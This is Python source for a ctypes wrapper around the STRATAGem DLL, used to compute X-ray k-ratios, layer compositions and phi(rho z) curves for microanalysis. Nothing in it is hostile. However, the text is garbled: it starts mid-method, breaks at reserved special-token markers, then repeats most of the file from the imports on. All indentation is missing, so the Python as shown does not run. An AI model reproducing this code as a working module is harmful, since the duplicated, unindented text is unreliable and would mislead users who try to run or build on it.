logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
key_ = self._stobjectnew(standard=True)
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error('Cannot save standard')
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error('Cannot set geometry parameters')
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
tilt_), c.byref(azimuth_)):
self._raise_error('Cannot get geometry parameters')
return toa_.value, tilt_.value, azimuth_.value
geometry = property(get_geometry, doc='Property to get geometry')
@_check_key
def set_prz_mode(self, mode):
"""
Sets the type of model to use for the :math:`\\phi(\\rho z)`.
:arg mode: type of model, either
* :data:`PRZMODE_XPP`
* :data:`PRZMODE_PAP`
* :data:`PRZMODE_GAU`
:type mode: :class:`int`
"""
mode_ = c.c_int(mode)
logger.debug('StSetPrzMode(%i)', mode)
self._lib.StSetPrzMode(mode_)
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
prz_mode = property(get_prz_mode, set_prz_mode, doc=
'Property to get/set prz mode')
@_check_key
def set_fluorescence(self, flag):
"""
Sets the fluorescence flag.
:arg flag: either
* :data:`FLUORESCENCE_NONE`
* :data:`FLUORESCENCE_LINE`
* :data:`FLUORESCENCE_LINE_CONT`
:type flag: :class:`int`
"""
flag_ = c.c_int(flag)
logger.debug('StSetFluorFlg(%i)', flag)
self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence, doc=
'Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory,
set_standard_directory, doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
Note that the computation also starts at 0 keV up to the specified energy.
:arg energy_high_eV: upper limit of the thickness in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of energies in electronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1000.0)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))
self._lib.StSetMaxHV(energy_)
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error('Cannot compute k-ratio vs energy')
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1000.0) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,
bHV_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,
step)
kratio = kratios[experiment][-1]
if kratio < 0:
logger.warn(
'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'
)
_energies, kratios = self.compute_kratio_vs_energy(
energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
import winreg
except ImportError:
try:
import _winreg as winreg
except ImportError:
class winreg:
HKEY_CURRENT_USER = None
class _PyHKEY(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def OpenKey(self, key, sub_key, res, sam):
return self._PyHKEY()
def QueryValueEx(self, key, value_name):
return None
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3
_REGISTRY_KEY = 'Software\\SAMx\\Stratagem\\Configuration'
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
<|reserved_special_token_0|>
PRZMODE_PAP = 1
<|reserved_special_token_0|>
PRZMODE_GAU = 2
<|reserved_special_token_0|>
FLUORESCENCE_NONE = 0
<|reserved_special_token_0|>
FLUORESCENCE_LINE = 1
<|reserved_special_token_0|>
FLUORESCENCE_LINE_CONT = 2
<|reserved_special_token_0|>
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
"""
Exception raised for all errors related to the STRATAGem interface.
"""
pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
) as key:
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug('dll=%s', dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd)
logger.debug('StEnableErrorDisplay(%r)', display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {}
self._substrate = None
self._experiments = {}
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def _stobjectnew(self, key=None, standard=False):
if key is None:
characters = string.ascii_lowercase
key = ''.join(random.choice(characters) for _ in range(8))
key = key.encode('ascii')
if not isinstance(key, c.c_byte):
key = c.create_string_buffer(key)
bnormal_ = c.c_bool(not standard)
iniflags_ = c.c_int(0)
logger.debug('StObjectNew(key, %r, %i)', not standard, 0)
if not self._lib.StObjectNew(key, bnormal_, iniflags_):
self._raise_error('Cannot create object')
return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear()
self._substrate = None
self._experiments.clear()
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m, layer.
mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc='Property to set/get sample')
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
key_ = self._stobjectnew(standard=True)
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error('Cannot save standard')
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1000.0)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error('Cannot add atomic number and line')
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_
):
self._raise_error('Cannot set standard')
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error('Cannot add experiment analyzed flag')
kratio_ = c.c_double(experiment.kratio)
logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
hv_, kratio_, c.c_double(0.0), c.c_int(2)):
self._raise_error('Cannot set experiment k-ratio')
if experiment.is_analyzed():
indexes = ielt_.value, iline_.value, iexpk_.value
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error('Cannot set geometry parameters')
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
tilt_), c.byref(azimuth_)):
self._raise_error('Cannot get geometry parameters')
return toa_.value, tilt_.value, azimuth_.value
geometry = property(get_geometry, doc='Property to get geometry')
@_check_key
def set_prz_mode(self, mode):
"""
Sets the type of model to use for the :math:`\\phi(\\rho z)`.
:arg mode: type of model, either
* :data:`PRZMODE_XPP`
* :data:`PRZMODE_PAP`
* :data:`PRZMODE_GAU`
:type mode: :class:`int`
"""
mode_ = c.c_int(mode)
logger.debug('StSetPrzMode(%i)', mode)
self._lib.StSetPrzMode(mode_)
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
prz_mode = property(get_prz_mode, set_prz_mode, doc=
'Property to get/set prz mode')
@_check_key
def set_fluorescence(self, flag):
"""
Sets the fluorescence flag.
:arg flag: either
* :data:`FLUORESCENCE_NONE`
* :data:`FLUORESCENCE_LINE`
* :data:`FLUORESCENCE_LINE_CONT`
:type flag: :class:`int`
"""
flag_ = c.c_int(flag)
logger.debug('StSetFluorFlg(%i)', flag)
self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
